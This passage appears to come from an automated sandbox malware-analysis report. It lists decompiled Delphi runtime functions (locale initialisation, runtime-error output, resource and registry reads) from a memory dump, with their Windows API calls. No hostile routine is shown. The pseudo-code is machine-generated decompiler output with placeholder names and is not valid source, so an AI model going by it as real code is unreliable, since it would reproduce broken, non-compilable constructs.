    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t19 > _t23);
    							}
    							if( *_t23 != 0) {
    								_t23 = CharNextA(_t23);
    							}
    						}
    						return _t23;
    					} else {
    						_t22 =  &(_t22[2]);
    						continue;
    					}
    				}
    			}




















    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
    				void _v1024;
    				char _v1088;
    				long _v1092;
    				void* _t12;
    				char* _t14;
    				intOrPtr _t16;
    				intOrPtr _t18;
    				intOrPtr _t24;
    				long _t32;
    
    				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
    				_t14 =  *0x45308c; // 0x454044
    				if( *_t14 == 0) {
    					_t16 =  *0x452f6c; // 0x405f30
    					_t9 = _t16 + 4; // 0xffe9
    					_t18 =  *0x454660; // 0x400000
    					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
    					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
    				}
    				_t24 =  *0x452f90; // 0x454214
    				E00402784(E00402A8C(_t24));
    				CharToOemA( &_v1024,  &_v1024);
    				_t32 = E00407764( &_v1024, __edi);
    				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
    				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
    			}













    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00401A74() {
    				void* _t2;
    				void* _t3;
    				void* _t14;
    				intOrPtr* _t19;
    				intOrPtr _t23;
    				intOrPtr _t26;
    				intOrPtr _t28;
    
    				_t26 = _t28;
    				if( *0x4545bc == 0) {
    					return _t2;
    				} else {
    					_push(_t26);
    					_push(E00401B4A);
    					_push( *[fs:edx]);
    					 *[fs:edx] = _t28;
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L0040130C();
    					}
    					 *0x4545bc = 0;
    					_t3 =  *0x45461c; // 0x0
    					LocalFree(_t3);
    					 *0x45461c = 0;
    					_t19 =  *0x4545e4; // 0x4545e4
    					while(_t19 != 0x4545e4) {
    						_t1 = _t19 + 8; // 0x0
    						VirtualFree( *_t1, 0, 0x8000);
    						_t19 =  *_t19;
    					}
    					E00401374(0x4545e4);
    					E00401374(0x4545f4);
    					E00401374(0x454620);
    					_t14 =  *0x4545dc; // 0x0
    					while(_t14 != 0) {
    						 *0x4545dc =  *_t14;
    						LocalFree(_t14);
    						_t14 =  *0x4545dc; // 0x0
    					}
    					_pop(_t23);
    					 *[fs:eax] = _t23;
    					_push(0x401b51);
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L00401314();
    					}
    					_push(0x4545c4);
    					L0040131C();
    					return 0;
    				}
    			}











    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				void* _t104;
    				void* _t111;
    				void* _t133;
    				intOrPtr _t183;
    				intOrPtr _t193;
    				intOrPtr _t194;
    
    				_t191 = __esi;
    				_t190 = __edi;
    				_t193 = _t194;
    				_t133 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t133 = _t133 - 1;
    				} while (_t133 != 0);
    				_push(__ebx);
    				_push(_t193);
    				_push(0x40b7df);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t194;
    				E0040B3A0();
    				E00409E60(__ebx, __edi, __esi);
    				_t196 =  *0x454744;
    				if( *0x454744 != 0) {
    					E0040A038(__esi, _t196);
    				}
    				_t132 = GetThreadLocale();
    				E00409DB0(_t43, 0, 0x14,  &_v20);
    				E00403EDC(0x454678, _v20);
    				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
    				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
    				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
    				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
    				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
    				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
    				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
    				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
    				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
    				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
    				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
    				E00403EDC(0x454684, _v36);
    				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
    				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
    				E00403EDC(0x454688, _v44);
    				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
    				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
    				E00403EDC(0x454690, _v52);
    				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
    				E00403EDC(0x454694, _v56);
    				E00403E88( &_v12);
    				E00403E88( &_v16);
    				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
    				_t104 = E00407174(0x40b7f4, 0, _t196);
    				_t197 = _t104;
    				if(_t104 != 0) {
    					E00403F20( &_v8, 0x40b84c);
    				} else {
    					E00403F20( &_v8, 0x40b840);
    				}
    				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
    				_t111 = E00407174(0x40b7f4, 0, _t197);
    				_t198 = _t111;
    				if(_t111 == 0) {
    					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
    					if(E00407174(0x40b7f4, 0, _t198) != 0) {
    						E00403F20( &_v12, 0x40b868);
    					} else {
    						E00403F20( &_v16, 0x40b858);
    					}
    				}
    				_push(_v12);
    				_push(_v8);
    				_push(":mm");
    				_push(_v16);
    				E00404208();
    				_push(_v12);
    				_push(_v8);
    				_push(":mm:ss");
    				_push(_v16);
    				E00404208();
    				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
    				_pop(_t183);
    				 *[fs:eax] = _t183;
    				_push(E0040B7E6);
    				return E00403EAC( &_v68, 0x10);
    			}


























    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
    				char _v260;
    				char _v768;
    				char _v772;
    				short* _v776;
    				intOrPtr _v780;
    				char _v784;
    				signed int _v788;
    				signed short* _v792;
    				char _v796;
    				char _v800;
    				intOrPtr* _v804;
    				void* __ebp;
    				signed char _t47;
    				signed int _t54;
    				void* _t62;
    				intOrPtr* _t73;
    				intOrPtr* _t91;
    				void* _t93;
    				void* _t95;
    				void* _t98;
    				void* _t99;
    				intOrPtr* _t108;
    				void* _t112;
    				intOrPtr _t113;
    				char* _t114;
    				void* _t115;
    
    				_t100 = __ecx;
    				_v780 = __ecx;
    				_t91 = __edx;
    				_v776 = __eax;
    				if(( *(__edx + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t47 =  *_t91;
    				if((_t47 & 0x00000fff) != 0xc) {
    					_push(_t91);
    					_push(_v776);
    					L0040C5A0();
    					return E0040D7EC(_v776);
    				} else {
    					if((_t47 & 0x00000040) == 0) {
    						_v792 =  *((intOrPtr*)(_t91 + 8));
    					} else {
    						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
    					}
    					_v788 =  *_v792 & 0x0000ffff;
    					_t93 = _v788 - 1;
    					if(_t93 < 0) {
    						L9:
    						_push( &_v772);
    						_t54 = _v788;
    						_push(_t54);
    						_push(0xc);
    						L0040C9F4();
    						_t113 = _t54;
    						if(_t113 == 0) {
    							E0040D544(_t100);
    						}
    						E0040DB18(_v776);
    						 *_v776 = 0x200c;
    						 *((intOrPtr*)(_v776 + 8)) = _t113;
    						_t95 = _v788 - 1;
    						if(_t95 < 0) {
    							L14:
    							_t97 = _v788 - 1;
    							if(E0040DB34(_v788 - 1, _t115) != 0) {
    								L0040CA0C();
    								E0040D7EC(_v792);
    								L0040CA0C();
    								E0040D7EC( &_v260);
    								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
    							}
    							_t62 = E0040DB64(_t97, _t115);
    						} else {
    							_t98 = _t95 + 1;
    							_t73 =  &_v768;
    							_t108 =  &_v260;
    							do {
    								 *_t108 =  *_t73;
    								_t108 = _t108 + 4;
    								_t73 = _t73 + 8;
    								_t98 = _t98 - 1;
    							} while (_t98 != 0);
    							do {
    								goto L14;
    							} while (_t62 != 0);
    							return _t62;
    						}
    					} else {
    						_t99 = _t93 + 1;
    						_t112 = 0;
    						_t114 =  &_v772;
    						do {
    							_v804 = _t114;
    							_push(_v804 + 4);
    							_t18 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040C9FC();
    							E0040D7EC(_v792);
    							_push( &_v784);
    							_t21 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040CA04();
    							E0040D7EC(_v792);
    							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
    							_t112 = _t112 + 1;
    							_t114 = _t114 + 8;
    							_t99 = _t99 - 1;
    						} while (_t99 != 0);
    						goto L9;
    					}
    				}
    			}






























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
    				long _v4;
    				int _t3;
    
    				if( *0x454044 == 0) {
    					if( *0x419030 == 0) {
    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
    					}
    					return _t3;
    				} else {
    					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
    						 *0x454230();
    					}
    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
    					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
    				}
    			}






    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B9A0() {
    				struct HINSTANCE__** _t2;
    				void* _t3;
    				struct HINSTANCE__** _t5;
    				struct HRSRC__* _t7;
    				struct HINSTANCE__** _t8;
    				intOrPtr* _t11;
    				intOrPtr* _t12;
    				struct HINSTANCE__* _t13;
    
    				_t2 =  *0x452f9c; // 0x45402c
    				if( *_t2 != 0) {
    					_t5 =  *0x452f9c; // 0x45402c
    					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
    					_t8 =  *0x452f9c; // 0x45402c
    					return LoadResource( *_t8, _t7);
    				}
    				_t3 = 0;
    				_t11 =  *0x4530b8; // 0x419034
    				_t12 =  *_t11;
    				if(_t12 != 0) {
    					while(1) {
    						_t13 =  *(_t12 + 4);
    						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
    						if(_t3 != 0) {
    							goto L5;
    						}
    						_t12 =  *_t12;
    						if(_t12 != 0) {
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t3;
    			}












    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
    				long _t11;
    				void* _t16;
    
    				_t16 = __ebx;
    				 *__edi =  *__edi + __ecx;
    				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
    				 *0x419008 = 2;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454046 = 2;
    				 *0x454000 = E00404B04;
    				if(E00402F5C() != 0) {
    					_t3 = E00402F8C();
    				}
    				E00403050(_t3);
    				 *0x45404c = 0xd7b0;
    				 *0x454218 = 0xd7b0;
    				 *0x4543e4 = 0xd7b0;
    				 *0x45403c = GetCommandLineA();
    				 *0x454038 = E004012C0();
    				if((GetVersion() & 0x80000000) == 0x80000000) {
    					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    				} else {
    					if((GetVersion() & 0x000000ff) <= 4) {
    						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    					} else {
    						 *0x4545b8 = 3;
    					}
    				}
    				_t11 = GetCurrentThreadId();
    				 *0x454030 = _t11;
    				return _t11;
    			}






    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				char _v297;
    				char _v304;
    				intOrPtr _v308;
    				char _v312;
    				char _v316;
    				char _v320;
    				intOrPtr _v324;
    				char _v328;
    				void* _v332;
    				char _v336;
    				char _v340;
    				char _v344;
    				char _v348;
    				intOrPtr _v352;
    				char _v356;
    				char _v360;
    				char _v364;
    				void* _v368;
    				char _v372;
    				intOrPtr _t52;
    				intOrPtr _t60;
    				intOrPtr _t82;
    				intOrPtr _t86;
    				intOrPtr _t89;
    				intOrPtr _t101;
    				void* _t108;
    				intOrPtr _t110;
    				void* _t113;
    
    				_t108 = __edi;
    				_v372 = 0;
    				_v336 = 0;
    				_v344 = 0;
    				_v340 = 0;
    				_v8 = 0;
    				_push(_t113);
    				_push(0x40ab3b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t113 + 0xfffffe90;
    				_t89 =  *((intOrPtr*)(_a4 - 4));
    				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
    					_t52 =  *0x453064; // 0x405f58
    					E00405824(_t52,  &_v8);
    				} else {
    					_t86 =  *0x453120; // 0x405f50
    					E00405824(_t86,  &_v8);
    				}
    				_t110 =  *((intOrPtr*)(_t89 + 0x18));
    				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
    				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
    					_v368 =  *(_t89 + 0xc);
    					_v364 = 5;
    					_v360 = _v8;
    					_v356 = 0xb;
    					_v352 = _t110;
    					_v348 = 5;
    					_t60 =  *0x453068; // 0x405f00
    					E00405824(_t60,  &_v372);
    					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
    				} else {
    					_v332 =  *(_t89 + 0xc);
    					_v328 = 5;
    					E004040F8( &_v340, 0x105,  &_v297);
    					E00407660(_v340,  &_v336);
    					_v324 = _v336;
    					_v320 = 0xb;
    					_v316 = _v8;
    					_v312 = 0xb;
    					_v308 = _t110;
    					_v304 = 5;
    					_t82 =  *0x4530a0; // 0x405ff8
    					E00405824(_t82,  &_v344);
    					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
    				}
    				_pop(_t101);
    				 *[fs:eax] = _t101;
    				_push(E0040AB42);
    				E00403E88( &_v372);
    				E00403EAC( &_v344, 3);
    				return E00403E88( &_v8);
    			}

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t73;
    				intOrPtr _t74;
    				intOrPtr _t83;
    				intOrPtr _t86;
    				intOrPtr* _t87;
    				void* _t93;
    
    				_t93 = __fp0;
    				_v8 = __ecx;
    				_t73 = __edx;
    				_t87 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t73);
    				} else {
    					_v12 = _t73 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t74 = 0x40a49c;
    				_t86 = 0x40a49c;
    				_t83 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t87, _t83) != 0) {
    					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
    					_t69 = E00407764(_t74, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
    						_t86 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t87,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t74;
    				_v832 = 6;
    				_v828 = _t86;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
    				return E00407764(_v8, _t86);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t74;
    				intOrPtr _t75;
    				intOrPtr _t85;
    				intOrPtr _t89;
    				intOrPtr* _t92;
    				void* _t105;
    
    				_v8 = __ecx;
    				_t74 = __edx;
    				_t92 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t74);
    				} else {
    					_v12 = _t74 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t75 = 0x40a49c;
    				_t89 = 0x40a49c;
    				_t85 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t92, _t85) != 0) {
    					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
    					_t69 = E00407764(_t75, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
    						_t89 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t92,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t75;
    				_v832 = 6;
    				_v828 = _t89;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
    				return E00407764(_v8, _t89);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 65%
    			E00402F8C() {
    				void* _v8;
    				char _v12;
    				int _v16;
    				signed short _t12;
    				signed short _t14;
    				intOrPtr _t27;
    				void* _t29;
